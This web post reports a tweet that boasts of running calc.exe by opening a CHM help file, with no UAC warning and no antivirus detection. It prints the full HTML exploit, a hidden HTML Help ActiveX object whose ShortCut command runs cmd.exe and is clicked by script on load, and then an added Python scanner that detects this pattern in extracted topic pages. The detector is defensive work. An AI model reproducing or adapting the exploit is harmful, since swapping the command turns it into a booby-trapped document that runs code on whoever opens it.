Run calc.exe via open Chm file, no UAC warning and no av detects!

powertool on Twitter: “Run calc.exe via open Chm file, no UAC warning and no av detects! Sample : https://t.co/ZntghJcnvZ http://t.co/NncyU0H2QI”

The exploit is:

    <HTML>
    <TITLE>Run calc.exe</TITLE>
    <HEAD>
    </HEAD>
    <BODY>
    <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
    <PARAM name="Command" value="ShortCut">
    <PARAM name="Button" value="Bitmap::shortcut">
    <PARAM name="Item1" value=",cmd.exe,/c calc ,">
    <PARAM name="Item2" value="273,1,1">
    </OBJECT>
    <script>
    x.Click();
    </SCRIPT>
    <A name=contents>
    <H2 align=center>Run calc.exe via open Chm file!!!</H2>
    <P></A>
    <H3 ALIGN=CENTER>@ithurricanept</H3><P>
    </BODY>
    </HTML>
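
For triage, the pattern above can be matched statically. The following Python is an added example, not part of the original post: it scans a topic page already extracted from a .chm for an OBJECT that uses the HTML Help control with Command=ShortCut, and reports the Item1 value and whether a script clicks the object. `scan_topic`, `HHShortcutScanner` and the sample string are names and data made up for this example.

```python
import re
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control, as it appears in the sample on this page
HH_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

class HHShortcutScanner(HTMLParser):
    """Collects <OBJECT> blocks that use the HTML Help control's ShortCut command."""
    def __init__(self):
        super().__init__()
        self.findings = []   # one dict per matching object
        self._obj = None     # <OBJECT> currently being parsed

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "").strip("{} ")
            self._obj = {"id": a.get("id", ""), "clsid": clsid, "params": {}}
        elif tag == "param" and self._obj is not None:
            # PARAM names are matched case-insensitively (Command, Item1, ...)
            self._obj["params"][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self._obj is not None:
            o, self._obj = self._obj, None
            command = o["params"].get("command", "").lower()
            if o["clsid"] == HH_CLSID and command == "shortcut":
                self.findings.append({"id": o["id"], "item1": o["params"].get("item1", "")})

def scan_topic(html):
    """Return one finding per ShortCut object; auto_click marks a scripted <id>.Click()."""
    scanner = HHShortcutScanner()
    scanner.feed(html)
    scanner.close()
    for f in scanner.findings:
        call = r"\b%s\s*\.\s*click\s*\(" % re.escape(f["id"])
        f["auto_click"] = bool(f["id"]) and re.search(call, html, re.I) is not None
    return scanner.findings

# Constructed sample input, modelled on the topic page shown above
SAMPLE = ('<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>'
          '<PARAM name="Command" value="ShortCut"><PARAM name="Item1" value=",cmd.exe,/c calc ,">'
          '</OBJECT><script>x.Click();</SCRIPT>')

if __name__ == "__main__":
    for finding in scan_topic(SAMPLE):
        print(finding)
```

A finding with `auto_click` set means the command in `item1` runs as soon as the topic is displayed, with no click from the reader.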

Proof:

[Image: chm]